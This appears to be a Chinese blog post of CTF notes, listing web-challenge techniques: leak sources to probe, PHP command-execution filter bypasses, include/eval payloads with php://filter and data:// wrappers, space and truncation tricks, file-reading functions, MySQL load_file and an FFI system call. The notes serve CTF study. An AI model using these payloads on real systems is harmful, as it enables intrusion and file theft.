0
点赞
收藏
分享

微信扫一扫

CTF笔记

小沙坨 2022-03-20 阅读 72

信息收集

  1. 源代码
  2. 响应包
  3. robots协议
  4. phps文件泄露
  5. www.zip代码泄露
  6. git代码泄露
  7. svn泄露
  8. vim缓存,第一次 .swp,第二次 .swo,第三次 .swn
  9. cookie
  10. dns TXT记录
  11. 环境默认账号密码
  12. PHP探针
  13. mdb文件( /db/db.mdb )
  14. 数据库备份( backup.sql )

爆破

  1. 弱口令
  2. 子域名
  3. 目录/文件

命令执行

关键字绕过

通配符

  1. ? 如:fla???
    • 如:fla*

单双引号

  1. ‘’ 如:fla’'g.php
  2. “” 如:flag.p""hp

函数

  1. include 如:include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
  2. require 与include几乎一样
  3. require_once 语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含
  4. eval 如:eval($_GET[1]);&1=system(‘nl flag.php’);

函数绕过

system

请添加图片描述

passthru

请添加图片描述

exec

请添加图片描述

shell_exec

请添加图片描述

popen

请添加图片描述

proc_open

请添加图片描述

pcntl_exec

请添加图片描述

反引号

``等同于shell_exec()

cat绕过

more

请添加图片描述

less

请添加图片描述

tac

请添加图片描述

cat

请添加图片描述

tail

请添加图片描述

nl

请添加图片描述

od

请添加图片描述

vi

请添加图片描述

vim

与 vi差不多

sort

请添加图片描述

uniq

请添加图片描述

file

  • 使用file -f使其报错出内容

请添加图片描述

grep

  • 在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

请添加图片描述

高亮文件绕过

  1. highlight_file(next(array_reverse(scandir(dirname(FILE)))));
  2. show_source(next(array_reverse(scandir(pos(localeconv())))));

分号

include可以不需要分号,可以用?>代替分号
如:include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
如:include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
如:include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

/dev/null 2>&1

/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
可以使用截断

  1. %0a
  2. %26
  3. ||

空格

  1. %09
  2. <
  3. ${IFS}

获取文件路径

  1. print_r(scandir(dirname(‘FILE’)));
  2. $a=new DirectoryIterator(‘glob:///*’);foreach($a as $f){echo($f->__toString()." ");}
  3. $a=opendir("./"); while (($file = readdir($a)) !== false){echo $file . “
    ”; };
  4. print_r(scandir(’./’));

读取文件

  1. echo file_get_contents(“filename”);
  2. readfile(“filename”);
  3. var_dump(file(‘filename’));
  4. print_r(file(‘filename’));
  5. fopen
    1. fread()
      请添加图片描述

    2. fgets()如:fopen(“flag.php”,“r”);while (!feof($a)) {$line = fgets($a);echo $line;}
      请添加图片描述

    3. fgetc()如:fopen(“flag.php”,“r”);while (!feof($a)) {$line = fgetc($a);echo $line;}
      请添加图片描述

    4. fgetss()
      请添加图片描述

    5. fgetcsv()如:fopen(“flag.php”,“r”);while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
      请添加图片描述

    6. gpassthru()
      请添加图片描述

通过复制重命名文件

如:copy(“flag.php”,“flag.txt”); rename(“flag.php”,“flag.txt”);

mysql load_file读取

try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row){echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

FFI拓展

$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();

举报

相关推荐

0 条评论